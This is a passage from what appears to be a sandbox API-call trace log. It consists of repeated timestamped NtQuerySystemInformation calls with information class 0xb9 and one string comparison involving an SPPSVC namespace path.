(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc650, Length=0x28, ResultLength=0x0) [0269.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc650, Length=0x28, ResultLength=0x0) [0269.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4f0, Length=0x20, ResultLength=0x0) [0269.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc470, Length=0x20, ResultLength=0x0) [0269.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc470, Length=0x20, ResultLength=0x0) [0269.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc470, Length=0x20, ResultLength=0x0) [0269.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x38, ResultLength=0x0) [0269.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x38, ResultLength=0x0) [0269.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5b0, Length=0x20, ResultLength=0x0) [0269.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc540, Length=0x20, ResultLength=0x0) [0269.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc540, Length=0x20, ResultLength=0x0) [0269.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfccf0, Length=0x20, ResultLength=0x0) [0269.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x50, ResultLength=0x0) [0269.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x50, ResultLength=0x0) [0269.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x50, ResultLength=0x0) [0269.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc960, Length=0x50, ResultLength=0x0) [0269.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc960, Length=0x50, ResultLength=0x0) [0269.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc960, Length=0x50, ResultLength=0x0) [0269.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc960, Length=0x50, ResultLength=0x0) [0269.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc890, Length=0x38, ResultLength=0x0) [0269.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6c0, Length=0x28, ResultLength=0x0) [0269.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6c0, Length=0x28, ResultLength=0x0) [0269.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6c0, Length=0x28, ResultLength=0x0) [0269.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x28, ResultLength=0x0) [0269.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc890, Length=0x38, ResultLength=0x0) [0269.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x28, ResultLength=0x0) [0269.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x28, ResultLength=0x0) [0269.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc890, Length=0x38, ResultLength=0x0) [0269.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x20, ResultLength=0x0) [0269.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc690, Length=0x20, ResultLength=0x0) [0269.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc690, Length=0x20, ResultLength=0x0) [0269.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc690, Length=0x20, ResultLength=0x0) [0269.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc890, Length=0x38, ResultLength=0x0) [0269.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x20, ResultLength=0x0) [0269.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6a0, Length=0x20, ResultLength=0x0) [0269.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6a0, Length=0x20, ResultLength=0x0) [0269.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x50, ResultLength=0x0) [0269.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x50, ResultLength=0x0) [0269.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x50, ResultLength=0x0) [0269.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc960, Length=0x50, ResultLength=0x0) [0269.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc960, Length=0x50, ResultLength=0x0) [0269.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc960, Length=0x50, ResultLength=0x0) [0269.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc960, Length=0x50, ResultLength=0x0) [0269.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc890, Length=0x38, ResultLength=0x0) [0269.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6c0, Length=0x28, ResultLength=0x0) [0269.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6c0, Length=0x28, ResultLength=0x0) [0269.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6c0, Length=0x28, ResultLength=0x0) [0269.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x28, ResultLength=0x0) [0269.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc890, Length=0x38, ResultLength=0x0) [0269.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x28, ResultLength=0x0) [0269.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x28, ResultLength=0x0) [0269.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc890, Length=0x38, ResultLength=0x0) [0269.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x20, ResultLength=0x0) [0269.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc690, Length=0x20, ResultLength=0x0) [0269.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc690, Length=0x20, ResultLength=0x0) [0269.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc690, Length=0x20, ResultLength=0x0) [0269.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc890, Length=0x38, ResultLength=0x0) [0269.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x20, ResultLength=0x0) [0269.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6a0, Length=0x20, ResultLength=0x0) [0269.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6a0, Length=0x20, ResultLength=0x0) [0269.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb20, Length=0x50, ResultLength=0x0) [0269.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcaa0, Length=0x28, ResultLength=0x0) [0269.957] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0269.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb20, Length=0x50, ResultLength=0x0) [0269.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb20, Length=0x50, ResultLength=0x0) [0269.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb20, Length=0x50, ResultLength=0x0) [0269.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca50, Length=0x38, ResultLength=0x0) [0269.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc880, Length=0x28, ResultLength=0x0) [0269.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc880, Length=0x28, ResultLength=0x0) [0269.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc880, Length=0x28, ResultLength=0x0) [0269.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8f0, Length=0x28, ResultLength=0x0) [0269.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca50, Length=0x38, ResultLength=0x0) [0269.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc970, Length=0x28, ResultLength=0x0) [0269.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc970, Length=0x28, ResultLength=0x0) [0269.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc810, Length=0x20, ResultLength=0x0) [0269.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc790, Length=0x20, ResultLength=0x0) [0269.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc790, Length=0x20, ResultLength=0x0) [0269.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc790, Length=0x20, ResultLength=0x0) [0269.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca50, Length=0x38, ResultLength=0x0) [0269.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca50, Length=0x38, ResultLength=0x0) [0269.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8d0, Length=0x20, ResultLength=0x0) [0269.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc860, Length=0x20, ResultLength=0x0) [0269.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc860, Length=0x20, ResultLength=0x0) [0269.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc50, Length=0x40, ResultLength=0x0) [0270.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbb0, Length=0x40, ResultLength=0x0) [0270.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbb0, Length=0x40, ResultLength=0x0) [0270.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcad0, Length=0x30, ResultLength=0x0) [0270.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcad0, Length=0x30, ResultLength=0x0) [0270.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9d8, Length=0x30, ResultLength=0x0) [0270.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc940, Length=0x38, ResultLength=0x0) [0270.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x50, ResultLength=0x0) [0270.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x28, ResultLength=0x0) [0270.741] _wcsicmp 